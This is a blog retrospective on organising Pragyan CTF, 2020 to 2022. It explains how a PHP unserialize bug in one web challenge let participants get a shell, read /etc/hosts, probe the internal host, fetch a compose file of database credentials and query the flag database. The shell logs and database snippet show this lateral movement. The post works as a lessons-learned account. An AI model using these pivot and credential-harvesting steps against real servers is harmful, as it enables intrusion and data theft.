Pragyan CTF 2020--2022
Pragyan CTF 2020--2022
image source: dailydot.com
A slight jump in the past, and we are back to the start of 2020, those nice Pre-covid vibes, where we used to be sitting together coding day and night while having loads of discussions and idea-sharing of course, for the upcoming Pragyan'20. For those of you who don't know what is Pragyan, well it is the Techno managerial festival of NIT Trichy, and I belong to the team which handles all the software-related things. CTF enthusiasts might recall Pragyan, because of the wonderful experiences they had with us during Pragyan CTF'20.
It's been almost 4 years, and we are still thriving to be better with every such mistake, of course, that's what we do, we are developers, we develop things, make them better and learn from mistakes. AND yes, I was the part of Pragyan CTF'20 developer team as well, just a member of that group with four sophomores, who just entered the realm of CTF, trying to host an event as large for the first time. These four kids weren't aware of the upcoming roller coaster ride.
Pragyan CTF is a 36-hour long jeopardy style capture the flag event, where around 1000 individuals participate from all around the world. I am not exaggerating, that is the number, and that was a surprise for us as well back then. Well, a scary surprise I must say.
We four, each of us responsible for one category each namely --- Forensics (That was handled by me), Binary and Reversing, Cryptography and finally Web. Starting from January we begin creating questions and working on our Infra along with it. That year we decided to go with Mellivora as our CTF engine (built with PHP) because of its easily scalable structure.
A week before the event goes live we started the final stress testing for the questions among our group mates. Like any other normal CTF, we hosted rooms for discussion over discord. Finally on 23rd Feb 2020, at 8:00 PM sharp the event went live and people started solving challenges one by one.
That was the moment of relief because that's what we have been working on for the past 2 months. The discussions over discord were also going great, people liked the challenges we made. We had our "Sorta Happy Moment" there. But how is it possible, everything is perfect on the very first go. We were very well aware of our extremely incredible luck.
Sometime around 10:00 pm, there was a discussion over discord about the platform going down all of a sudden. Not even a second of relaxation and the platform actually went down, the reason still being unknown at that moment.
And it was at this moment we realised, we.... Never mind.
The server was turned off by one of our group mates because of some suspicious behaviour in the logs he noticed. There was a discussion over CTFtime and discord about the same, because of some mistake we made in one of the challenges. We started working, trying to keep each other's morale up. Obviously, nothing worse could have happened. And.....
At the very same moment, we lost access to the mod permissions of the discord server as well. The night couldn't have been better, to be honest.
Sarcasm!!! Image source: https://giphy.com/gifs/bazinga-YWZPFFCblEqsw
The things kept going worse. Internet is definitely a boon for many, we became a source of entertainment when participants started posting memes over CTFtime instead of solving challenges.
image source: one of our amazing participant teams
Scratching our heads, we were confused about what could have possibly happened. The discussions described that one of our challenges allowed RCE over our server when we knew that we tried to prevent it in every possible way. It took us a while to figure out the actual issue why it happened. Apparently, we forgot to test one of the Web challenges.
The challenge was fixed and the server went up again, we took a heavy breathe to relax. Nope! not that easily.
We forgot that the challenge was fixed, but we didn't fix the damage it made already. It was because of the lovely participants we had to witness this over CTFtime.
image credits: again the same set of participants
Yes, all the flags were leaked by one team. But we had to forget the unprofessional behaviour and focus on how to fix it whole. And yet again we had to turn our server down immediately (it was 3:23 AM). Our morale totally went down. But thanks to some good participants we had, who kept motivating us, especially the super friendly people from Team-BI0S.
The whole reason behind this mess was:
One of our Web challenges named Brutus had a small issue in PHP unserialise which gave RCE privileges to every user. We forgot to implement a time-out check over the challenge and in no time the users figured out the bug and comfortably used it to create a reverse shell to the server.
www-data@5841bda2da57:/code$ cat /etc/hosts\
127.0.0.1 localhost\
::1 localhost ip6-localhost ip6-loopback\
fe00::0 ip6-localnet\
ff00::0 ip6-mcastprefix\
ff02::1 ip6-allnodes\
ff02::2 ip6-allrouters\
172.26.0.4 5841bda2da57
Users used this to check the /etc/hosts
file which gave the IP address of the internal server i.e. 172.26.0.4
After that, it was pretty easy to guess that the host server could have the IP address 172.26.0.1
.
www-data@5841bda2da57:/code$ curl 172.26.0.1\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\
<**html**>\
<**head**>\
<**title**>Index of /</**title**>\
</**head**>\
<**body**>\
<**h1**>Index of /</**h1**>\
<**table**>\
<**tr**><**th** valign="top"><**img** src="/icons/blank.gif" alt="[ICO]"></**th**><**th**><**a** href="?C=N;O=D">Name</**a**></**th**><**th**><**a** href="?C=M;O=A">L\
ast modified</**a**></**th**><**th**><**a** href="?C=S;O=A">Size</**a**></**th**><**th**><**a** href="?C=D;O=A">Description</**a**></**th**></**tr**>\
<**tr**><**th** colspan="5"><**hr**></**th**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/folder.gif" alt="[DIR]"></**td**><**td**><**a** href="mellivora/">mellivora/</**a**></**td**><**td** align="right">\
2020-02-21 22:08 </**td**><**td** align="right"> - </**td**><**td**> </**td**></**tr**>\
<**tr**><**th** colspan="5"><**hr**></**th**></**tr**>\
</**table**>\
<**address**>Apache/2.4.29 (Ubuntu) Server at 172.26.0.1 Port 80</**address**>\
</**body**></**html**>
Now, as I mentioned that we were using Mellivora CTF-engine to host the platform, it was available at 172.26.0.1/mellivora
.
www-data@5841bda2da57:/code$ curl 172.26.0.1/mellivora/\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\
<**html**>\
<**head**>\
<**title**>Index of /mellivora</**title**>\
</**head**>\
<**body**>\
<**h1**>Index of /mellivora</**h1**>\
<**table**>\
<**tr**><**th** valign="top"><**img** src="/icons/blank.gif" alt="[ICO]"></**th**><**th**><**a** href="?C=N;O=D">Name</**a**></**th**><**th**><**a** href="?C=M;O=A">Last modified</**a**></**th**><**th**><**a** href="?C=S;O=A">Size</**a**></**th**><**th**><**a** href="?C=D;O=A">Description</**a**></**th**></**tr**>\
<**tr**><**th** colspan="5"><**hr**></**th**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/back.gif" alt="[PARENTDIR]"></**td**><**td**><**a** href="/">Parent Directory</**a**></**td**><**td**> </**td**><**td** align="right"> - </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/unknown.gif" alt="[ ]"></**td**><**td**><**a** href="Dockerfile">Dockerfile</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right">720 </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/unknown.gif" alt="[ ]"></**td**><**td**><**a** href="LICENSE">LICENSE</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right"> 34K</**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/text.gif" alt="[TXT]"></**td**><**td**><**a** href="README.md">README.md</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right">2.8K</**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/text.gif" alt="[TXT]"></**td**><**td**><**a** href="benchmarks.md">benchmarks.md</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right">6.4K</**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/unknown.gif" alt="[ ]"></**td**><**td**><**a** href="codeception.yml">codeception.yml</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right">340 </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/unknown.gif" alt="[ ]"></**td**><**td**><**a** href="composer.json">composer.json</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right">696 </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/unknown.gif" alt="[ ]"></**td**><**td**><**a** href="composer.lock">composer.lock</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right">106K</**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/unknown.gif" alt="[ ]"></**td**><**td**><**a** href="docker-compose.dev.yml">docker-compose.dev.yml</**a**></**td**><**td** align="right">2020-02-22 06:35 </**td**><**td** align="right">1.1K</**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/unknown.gif" alt="[ ]"></**td**><**td**><**a** href="docker-compose.test.yml">docker-compose.test.yml</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right">1.2K</**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/folder.gif" alt="[DIR]"></**td**><**td**><**a** href="htdocs/">htdocs/</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right"> - </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/folder.gif" alt="[DIR]"></**td**><**td**><**a** href="include/">include/</**a**></**td**><**td** align="right">2020-02-20 13:35 </**td**><**td** align="right"> - </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/folder.gif" alt="[DIR]"></**td**><**td**><**a** href="install/">install/</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right"> - </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/text.gif" alt="[TXT]"></**td**><**td**><**a** href="rules.txt">rules.txt</**a**></**td**><**td** align="right">2020-02-21 22:08 </**td**><**td** align="right">826 </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/folder.gif" alt="[DIR]"></**td**><**td**><**a** href="tests/">tests/</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right"> - </**td**><**td**> </**td**></**tr**>\
<**tr**><**td** valign="top"><**img** src="/icons/folder.gif" alt="[DIR]"></**td**><**td**><**a** href="writable/">writable/</**a**></**td**><**td** align="right">2020-02-17 12:37 </**td**><**td** align="right"> - </**td**><**td**> </**td**></**tr**>\
<**tr**><**th** colspan="5"><**hr**></**th**></**tr**>\
</**table**>\
<**address**>Apache/2.4.29 (Ubuntu) Server at 172.26.0.1 Port 80</**address**>\
</**body**></**html**>
If you look at the Github repo for Mellivora, you will find a docker-compose.dev.yml file that was easily accessible now.
www-data@5841bda2da57:/code$ curl 172.26.0.1/mellivora/docker-compose.dev.yml\
version: '3'\
services:\
mellivora:\
image: mellivora\
ports:\
- 4000:80\
- 4002:443\
build:\
context: .\
dockerfile: Dockerfile\
environment:\
MELLIVORA_CONFIG_DB_ENGINE: mysql\
MELLIVORA_CONFIG_DB_HOST: db\
MELLIVORA_CONFIG_DB_PORT: 3306\
MELLIVORA_CONFIG_DB_NAME: [redacted]\
MELLIVORA_CONFIG_DB_USER: [redacted]\
MELLIVORA_CONFIG_DB_PASSWORD: [redacted]\
volumes:\
- .:/var/www/mellivora\
- composer dependencies:/var/www/mellivora/include/thirdparty/composer\
links:\
- db\
db:\
image: mysql:5.6\
ports:\
- 13306:3306\
environment:\
MYSQL_DATABASE: [redacted]\
MYSQL_USER: [redacted]\
MYSQL_PASSWORD: [redacted]\
MYSQL_ROOT_PASSWORD: [redacted]\
volumes:\
- dbdata:/var/lib/mysql\
- ./install/sql:/docker-entrypoint-initdb.d\
adminer:\
image: adminer\
restart: always\
ports:\
- 15246:8080\
volumes:\
composerdependencies:\
dbdata:
This file gave the user the password to our database container. Therefore, using these details some teams were able to get access to all the flags, and one of them leaked them over CTFtime apparently.
$con = new mysqli('172.26.0.1','[redacted]','[redacted]','[redacted]');
$res = $con->query('show databases')->fetch_all();
var_dump($res);
Basically, the host server and the challenges could have been separated in the beginning itself, which could have prevented this huge mess.
We worked overnight and changed all the flags, resolved the bug in the challenge, and we were able to host the CTF up the next day successfully. We had to deal with a lot of criticism, but at the end of the day, we were able to finish the event happily.
Fast forward to 2021, time for a totally new Pragyan edition. Now we were aware of the mistakes we made last year, and we planned to improve them this time.
The idea was to host a scalable CTF platform, and so we chose HaProxy + Kubernetes for the challenges.
The first step was to set up a K8 cluster on Google cloud.
$ echo "deb [signed-by=/usr/share/keyrings/cloud.google.gpg] https://packages.cloud.google.com/apt cloud-sdk main" | sudo tee -a /etc/apt/sources.list.d/google-cloud-sdk.list
# Install depssudo\
$ apt-get install apt-transport-https ca-certificates gnupg
# Import google cloud public key\
$ curl https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key --keyring /usr/share/keyrings/cloud.google.gpg add -
# Update apt package index, install cloud sdksudo\
$ apt-get update && sudo apt-get install google-cloud-sdk
The next step was to create a cluster, based on the number of nodes we needed and the regions we wanted them to deploy in.
$ `gcloud compute machine-types list`
$ `gcloud compute zones list`
After this, we can simply run the following command to create a cluster
$ gcloud container clusters create cluster-name \\
--zone compute-zone \\
--machine-type <machine-type you chose> \\
--num-nodes <number of nodes in the cluster> \\
--tags challenges
Note the tags option, these will assign a tag to each VM instance on the node.
Now, the final step was to use kubectl to deploy challenges on the cluster. For this step, we had to create docker images for all the challenges locally and push them to a registry. Once the images were pushed, all that remained was to write a YAML file to deploy them, something similar to this
Followed by kubectl apply -f deployment.yml
Setting up a HaProxy Load Balancer in front of your cluster
To create a load balancer, we just provisioned a separate VM and installed HaProxy over it. Now all that was left to do was configure the HaProxy config file in a way similar to this.
And that's it. The events went live and ended successfully with no issues till the end.
You can check the questions out at
GitHub - Bhavesh0327/pctf_20
*You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or...*github.com
GitHub - Bhavesh0327/PCTF21
*Contribute to Bhavesh0327/PCTF21 development by creating an account on GitHub.*github.com
Well, this was it. Do not miss out upcoming editions of the Pragyan CTF.